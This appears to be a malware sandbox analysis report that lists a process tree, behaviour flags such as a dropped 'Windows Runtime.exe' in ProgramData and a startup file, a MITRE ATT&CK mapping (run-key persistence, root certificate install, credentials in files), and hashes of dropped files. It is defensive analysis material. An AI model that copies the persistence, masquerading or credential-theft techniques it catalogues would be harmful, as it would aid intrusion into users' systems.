"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
2⤵
PID:4144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3092 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
2⤵
PID:3300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4336 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
2⤵
PID:3076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4480 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
2⤵
PID:4724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
2⤵
PID:940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4572 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
2⤵
PID:4616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
2⤵
PID:4692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
2⤵
PID:2256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4560 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
2⤵
PID:4208

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3236

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Drops startup file
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4292

C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
1⤵
- Executes dropped EXE
PID:1304

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4956

C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
1⤵
- Executes dropped EXE
PID:4460

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc6e3fab58,0x7ffc6e3fab68,0x7ffc6e3fab78
2⤵
PID:2216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:2
2⤵
PID:716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
2⤵
PID:820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
2⤵
PID:4552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:1
2⤵
PID:3604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3088 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:1
2⤵
PID:4396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4412 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:1
2⤵
PID:2204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4520 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
2⤵
PID:5068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
2⤵
PID:2388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
2⤵
PID:4332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4940 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
2⤵
PID:4428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 --field-trial-handle=1948,i,16471841009188237804,13192092157971266514,131072 /prefetch:8
2⤵
PID:3484

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:1048

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe
Filesize
594KB

MD5
94e4b670189f87d332c5bdc69363d692

SHA1
999b6fbe16d55245ab6fc7556c0fa22bd342be9c

SHA256
704dec3412a51ed958a31ca9a0713bfdd87932be25c7dc433a5912276e84b09a

SHA512
9e7d2ae090799ad6650c314b7d1e56df1de3a7b032a72121c2f48766f7fefed88d6cb2c498f0b062e4b0d55589dee0f26b4a965a6a5d43f2bbe2aed9396e43d2

Download Submit
C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe.config
Filesize
1KB

MD5
c4e744aeeb41bc74472cbbd0ad9daa3b

SHA1
13c543d9dae64b8c3df3f53c01f712ddc9e767e3

SHA256
47f58b63f0c21705a03ef981037a4146589e67922d9c68c1d1de3951102c1b36

SHA512
41dd5340c0c3c16365a535d772bd909469b131a91189533454c99fb580afbb66cc1054ae66110a64f3395ea3daec9a6c9f1a87b5447a68d05821ebcfa86ba57e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
Filesize
40B

MD5
efdf336c3d3a1adb92b2ad84b9e0ddf8

SHA1
d12684bf46d8efdc7fe65d72974a64f8cfc83aae

SHA256
a3b64fe67ea4be6fd1cad4f43ab347f08f3c05afd11552101ddc5f80fd3e31cc

SHA512
d47956132f95e0f8c31b0d8e8b23a7748b4fd39b6acf746e65600499bb6dac8bf3ba64843a090e41066de86eadd02aeb9c1ebd3ab9cdee4bd9d7867febbb696e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a
Filesize
203KB

MD5
99916ce0720ed460e59d3fbd24d55be2

SHA1
d6bb9106eb65e3b84bfe03d872c931fb27f5a3db

SHA256
07118bf4bbc3ba87d75cbc11ddf427219a14d518436d7f3886d75301f897edaf

SHA512
8d3d52e57806d1850b57bffee12c1a8d9e1a1edcf871b2395df5c889991a183a8d652a0636d5452068f5ef78d37e08ce10b2b2f4e05c3e3c0f2f2230310418a8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000028
Filesize
24KB

MD5
1fc15b901524b92722f9ff863f892a2b

SHA1
cfd0a92d2c92614684524739630a35750c0103ec

SHA256
da9a1e371b04099955c3a322baee3aeee1962c8b8dabe559703a7c2699968ef4

SHA512
5cdc691e1be0d28c30819c0245b292d914f0a5beaed3f4fc42ac67ba22834808d66a0bfc663d625274631957c9b7760ada4088309b5941786c794edad1329c75

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
72B

MD5
776d6fd51cbbc6bdc72ee3a6bb743498

SHA1
95907606f36972bb4c54ad65d14a778e6db5a672

SHA256
92736d249e9399f775313a47ca18e063599682fc94752e114e37c7f6c0bf88bf

SHA512
feb2b9b41cf2cf36a791b4f7c0ca815c19994efbc5d9892bff65e6a2629d563455904fab7c3ccb735f46eb48bfab01566e120091fd428ad425bce90057293dbc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
192B

MD5
6626084b7cd23c71c371454d9c54e75c

SHA1
2c7b07b34d30a33facbcb351481e54a855e15fe4

SHA256
73f12dc74deed1179c1e2c4bd3b33d24d30e3a961106e6591583c4cd7c43b955

SHA512
6406d7d18313cf2bde14cbee6e272b98809bcb1e8b279e70ffda336a9038516cb0137e9681179ef2980b96428462dc05670e832761072912a0484fe0d96e00c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
192B

MD5
fdc08bd871612d8b10d515b9ece99204

SHA1
fe9137168062d38f2dd349950e62ab65c67ede61

SHA256
6754252da336dfc3c2f6df0ce777b12c73b58e9985a8fd54e2c8883e82c08e07

SHA512
4dc133db88492e550817195110f8f9d39a5dedfe80c25a5533db73d51ffe8380793c7e50aeb314ace2f9143836b9a97e78216e9846158ac28cc0513a0c2e02ea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
840B

MD5
e936e40ce81959094393335823f47de6

SHA1
9e7f72ac774678bbc6d7d43d0e638593070577b2

SHA256
61e4e496e140107699e81c8d3b8404acb842cff6f6544819e296fae7935b982b

SHA512
b5295e62963cc9bfe1cad6d8ebe8fbe05764a3dca3fc22eec998f3ed27e56c80f892f8cb550b660652dda5ab2a96855657f9705cad2d24acea686844a5b335bb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
336B

MD5
b1a9d7dfff6410eec200e4ea9fff7bf6

SHA1
2a2207ebe702133516a21ef7f56dcca2c5ce1fa8

SHA256
67703722ea897602619846e4f6d31103b335067904c1df5cafe56e7a21e9fd72

SHA512
6ac19934817db92844e67034473032c2d209a43836069f84b7dc00087e99346bb825adfbc7224817799dd84e62c9e034ce365be04aa6698402fd4de5e539c17a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
d6806707ea068f2c53d212cfdb689c60

SHA1
ffe08b94c3260a2a1f60a18cd8b29a9df76a7476

SHA256
fb1701c9bbd7c3e7325bb54d7d4b5624e62ac515f8a1dd1dedecd6541c48bf06

SHA512
1b7367d71b8a6c5d41454eaea1f40a5885080c4e8b0abdcb87507a85e0d35aa357baec247f5c0d3501882823ce97b9ea1e80487eca4fefe8685a9c7652c48f2d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
2KB

MD5
5e5f644146db3fc993e0e7c4c040e844

SHA1
c1012e293a27fbc23797f9f005c464a506f38209

SHA256
8d58a3567d8fd571dda0776b160c24a833094c680692fde24606dfbf4609e83f

SHA512
b39333f010be5dc6a122dec2beff0dac795143ce467d1c8bc6e6f2683fc41feb0665ddd118285f2c7f9cdb196fe8f99193de2308f1b4f07b6b3959aa3998c437

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
2KB

MD5
a4cd6b061b9044eb475c445756c2957b

SHA1
c87019925c408e5b5cd6618814435961078eda63

SHA256
b764244ff47b44d84decc95eb32284c5585e3020cfbea9972f144e691c580828

SHA512
ae7a5d8fc64dabed5d749d059445499e970a16db31766b3383690e82b2d2cbc8ece626bea81609871afcac3c2c8e82bcfc930e334dc47f278f8d238b3e78d61c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
3KB

MD5
76e629792c841beeb50434fe4298cb54

SHA1
f7d8821fafc0c03f9dcc4201b7463c6d925d5139

SHA256
cc1fc51c632221036ea35b5b6332af3d878011c2d17c3aefb388b8a8a4c7e99f

SHA512
fbf2523fb3fbb81277a16884123fb0f196984435a55069ad3b5dfdd0570c29e33a23f5b44cb25b5793326747ad4774bea65123ae09b30b4298e3a17f2bd6de0e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
2KB

MD5
9b8511fd1a32fce1d622b29deb1f764c

SHA1
a9a2ac8fb557760ec8589d001e70355af502a16f

SHA256
0eeb4da9653050f7fb06cb1f99583d3c54689c715788dadb1fdfd38a2f2c4a9c

SHA512
d49ec68fb5861033be618933e8e0dc076f46972c0498fb7059abc3c8b151a65054131ad4db65544389ffc80380f895bbcec03a704e47d6408dd6946498030c03

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
4KB

MD5
b24c448266caee49e23a5348617bfd39

SHA1
be78c0b27abef72d586ef28a1926abb39ba02d39

SHA256
f82d6798a9744f6c4f66f4f5dedf003e21cb7f4b8a5a4b14b24097aea4cc3952

SHA512
e3e65f35f8407a3986138fe436b586e48f8ff53df6a7278f1067851e9f8803e8a11615a6f6102a6f9b3f41c8118576457f67b50454bfb270bc8f140477861bb3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
354B

MD5
e1136fa6a422a4ad19c7112e8d4df127

SHA1
8533cd7fffa6b17a45fb71eba44ad74aff6990f2

SHA256
bd185b5df47ac7990e2258520df8d810c87ba0ccdb9d6023e33fb01abe7071c5

SHA512
03cb9f4800ede952665df59b3832cf1f52478147601dbba3bd3ff761e6d4c200494c66c8162d686a9e9c6acf87a80b8ba11a7e57e6b8fb27e433f02a9cdddcf1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
352B

MD5
004f6193450bcbf8920692dd30533c0b

SHA1
6aa60d0108aee8bb633675d63953ee1f239d3849

SHA256
f3666fdcc921e04392ddb5a67ee74c63e555bd8ac484fc59beee3f858da5726c

SHA512
0b3a1a5d36123e57280b108d7f18ca5edca08c7b260e26e6be19eb39344b5519323ef9d49e6a82be545e9f0c2c3bcef7cbbb76815e6ee9a6867d49186276f6c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
356B

MD5
818cb9294d4c666028a7770b35622456

SHA1
299a8bdeac9e5c828f3399b103cbedf4f2b0ea19

SHA256
9a1d332dd94c8813f741e478f61c94086c1c1e4ec54ca010c5411c8c3cb9e9dc

SHA512
b24fce7935a247214c68af17fa90b1ec8bbebbb8f3505d4276d90f02c96c7b187434bd5265cff538c08384bb481404069fe624ced3b15ec345355f97f6365875

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
524B

MD5
c97289bb3bbc8c73734d0952882ca5e5

SHA1
21f5df309def24aff973653a93cd4b9b9b0edd0f

SHA256
ac87ed017e231ea95977098737ad0c36b34c6260be597d4d8471a4c1b9b0a81b

SHA512
937abb32df5333b0f7cae92ff547732c1dd22ea47644271309055b1428521a44c1a93cad0f9a8906562dff6b9c1cddf863ec02c0889b82a7c2d9e704def1909a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
da28fcc2a054c01a121f10d2595dc559

SHA1
7d7ff29c22b7f686418f2994eb4b62e4c56dd30e

SHA256
bbcab17f0ae124b32ece3635ac5f66ad6efea5ebc50801800d416d00d864cbaa

SHA512
1af4b34876b4387a9bee95808e66d75859fd03286edc2a796c877805e2f4bda68c9e0ffa0054bfa568945ebc557a61c25e12bfd21dda44dcfc0cbcee840087dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
356B

MD5
bd61e23dab4728c4eae09f5d81898362

SHA1
7dc13ce6e2808a40a283b1730eab93fb5fea76ab

SHA256
aaa5a6b31fac2a0b5f3b15cf171eb41d776bf2a7dfd63fac786d237444e3d38f

SHA512
0676348470dd598987c499c98608662288122f3862837a50cf872bcb9bceef7531d08703e93acd6497c58c3a7ca679a93f8ff11362f942e76ab55e855a0c9aa5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
7KB

MD5
1063b96ce3e12b3723352bb2c2f9c868

SHA1
be988d061d065eefa0dca920f8af9b1edb46f8df

SHA256
4b80eeb601e370c21d8755b4904c528b545c32005f5ac12bc49e67c6c08a182e

SHA512
7b2601898fa05d417e40b542923531f7c6daef37d8ce871cfc156356411e0b03bf928a5761b510227c121ce6040e35a68959f87d1eba744275b071e4d929b41e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
7KB

MD5
7349b6aeab1cd5a4e0c3c3fa1a5a14b7

SHA1
5af81ffd0aa1d35305074f62f3b3ec0cc88190b0

SHA256
1f52455c378a4a94b2f36bdbf52dc5917baea78a53b4409b16373f39d6d632b8

SHA512
a621e3349a537ad4ca58cca2edac8e9deb2ce7f044ab2093776c9b31102c8a3c31bf7d9d8ad3880a986922c9a37c9f043a725f7b9021949739f596307396ddf7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
7da73e80b3b272e213d5842da73a68d3

SHA1
d65a930d1a67bc59ff3d33b1056cdcc93bf38e03

SHA256
ab59de320872561a6718b47dfb31daf3016a5deee4bbd1b065444ba9f6b66c41

SHA512
da3e972329ecd5026491398d0ab229b363657ce91a52933179aa4e8b867fbba348d807446fb4a7e1f1303fcd66a7f23a9832985e5e8d4f3cbcdd1d4685691cac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
7KB

MD5
2edc953a0efbb572e70d7df025c74fea

SHA1
3dfd5339f84999622d4176f27e661e1d5e77ab15

SHA256
5466b09e7602e422c3a8d7590e29c7993a4e2c6479455a533c9cb04ab1ab11b4

SHA512
600a04669a5a10488a8c4573c4913419c92bc69332a405b9d7a17787df9fd6febe1f1fe4c7ef8efc2eef854052dd706f33cfbde78e09f39cb5a502d9b3889001

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
8KB

MD5
bdc95d383db798c11096ce1011438c2b

SHA1
112dd3163760b4a33a98273a866ab2bde0bff38d

SHA256
5d49763ca83d5aa997af8ff3b456b23cfb9cc0875df79baae2265a820df55a05

SHA512
7b32349ffc3ad5b8eb328dd02d6438500f466b211dd2ce36d8d777dc955336dde45b688b5d815743c920bc14a162ed02baa80c248b5dc1e5167b91a8f541762a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
16KB

MD5
96bf7038f3e4e6be9b34943bb5bdcf36

SHA1
f945c1c9b83e1d531b5cf0fb610aa50230f83c2f

SHA256
aa4c4fb0d008e3317e18fb70fe6421162c81bf0a5e327f15e594ae24b20cf38c

SHA512
11360b98558d830cac95397b846792c1464485adf29b979a9247330e7f43c9f720bc5476850931672fd64120cf70fdd3f31c097d1c3c5bf9a0acce74bbec1bc8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize
96B

MD5
11a329c9dace4dde0d0fe386ee013616

SHA1
9d283e8cc5362f5b80a03bfa03a692d35a893005

SHA256
6aaf03ea597d52de8dec021fc7d5923c7adebd36a108348939a232805faf2333

SHA512
a02c59865253c0fc409ca3ca826842c909cd9b71292742b042f252b0755da5ff90495120fb33850e2926063d3a15951601d36b521b26eea8f741b7d718b57a0a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
276KB

MD5
f81db55aab477a6454df04e58626eff6

SHA1
ed3b17cf2df7330605d1a98d6053fa117549dd16

SHA256
3607daea5a877df657e28d4391ef08dd38b0bfca28a669e1800192ae51045f03

SHA512
c0337f9699b5c4d925284d70a999d87b4ca99392969ea99fb1d1e2b04b34f6861a19da2e38ca8386cc99aac60d60f82794812b1ff0c3597cd9e8f2a9f2f6276c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
141KB

MD5
64339f913528c7baeea5c65eaf376dfa

SHA1
bdba8dfcfafa3d47de0a3c25399f9318261d5569

SHA256
fa6f6aa68d1a3210ac1c425efb5ffded19589a3e48146e29b6b02bfb58dfb66f

SHA512
bfe01f5f284ef4988579dac5df16c3728e4ef244fcbc34bbae11763ba16321bad35554c920427c82e795798be5e18ae2e2c4b09d50b2bb8a92a3ff512e0c3311

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
89KB

MD5
8030f4f6b44de60a0e6bae25ff49ab8c

SHA1
3da1ec6e1419009b71e83456cc7307d2241f7c0e

SHA256
b1f9b8e578c95c7de22a86f776e894125bcb989a706a75322577647b0dd9e816

SHA512
500c7c54f33f557549b24dc7ffd6f44259836a03d746f0cfc1667060a1970828c5db04513cf92f440ef3bff24cdc141fffbd4b8b506f0f0883026dd654b89292

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
101KB

MD5
c76afdce849dff1ac9e861924c52d662

SHA1
9d5f009123ca765da25f4c5be8ff4483eb881ed2

SHA256
d9fab6a4a3842480bc8260ba544aca0d61a5f9ced688b05b3c711ca7f33f2435

SHA512
893bd1428c58fc756a215708eeb6a48f0af3425f5850d1f031a405b6f5585d87b415f8198039e8d859c359e14994610b24080c8e4a12ef0de8645e1b71cb06d5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
100KB

MD5
eebcbf134440d8b888ecd79ea1d98490

SHA1
314c76cef35644cd4da6ca78c7badc31e78b2dc0

SHA256
de5ec7dce7548adb1098ab33c6925bde74c2fef6799f169a19222c84b31ab7bc

SHA512
ae7180aa06e9d6d993b17e944e7ef6cdb1450a626788ce9e9248ca01c2274e90e1b940a0ec2987cc0a004f695e82d06cca9546327cef17983f76b4b64cc0cdec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
4a154efa7af25bb8b94d0d9c7b4f15cd

SHA1
5e0e04103e4eef1bc7ef242b730aed1958f98e1f

SHA256
c216eda372556eb78e680bde247c2fd2085642ee33031905a213c6bec502ccce

SHA512
fc4678133318fe1952947be74e244246336c7faacc9b9ae32336d57b106ec8f044e5db41dd98e8f3a54270ddacab2fc84a66d5d67deeadc3056ea5213bcbbba4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
9d0c7a5b4a312cb4de907976071d2e6f

SHA1
890cbc873940e05ef034e81639d2ad476a7eb4f2

SHA256
7713d4b3cdbde7cff82631345d58b2de7a5485bf71dd79eef599f0edaec80ae8

SHA512
e46a876ff2c4389af1f2253ff5c87a719ce28c448f1e73854ea645034b389efad8b8520cb394808740649488dbc313ba52afbcd5c99e5266162323f20f246de4

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3264\PreparePrereqDlgProgress.gif
Filesize
24KB

MD5
f550f449baed1315c7965bd826c2510b

SHA1
772e6e82765dcfda319a68380981d77b83a3ab1b

SHA256
0ee7650c7faf97126ddbc7d21812e093af4f2317f3edcff16d2d6137d3c0544d

SHA512
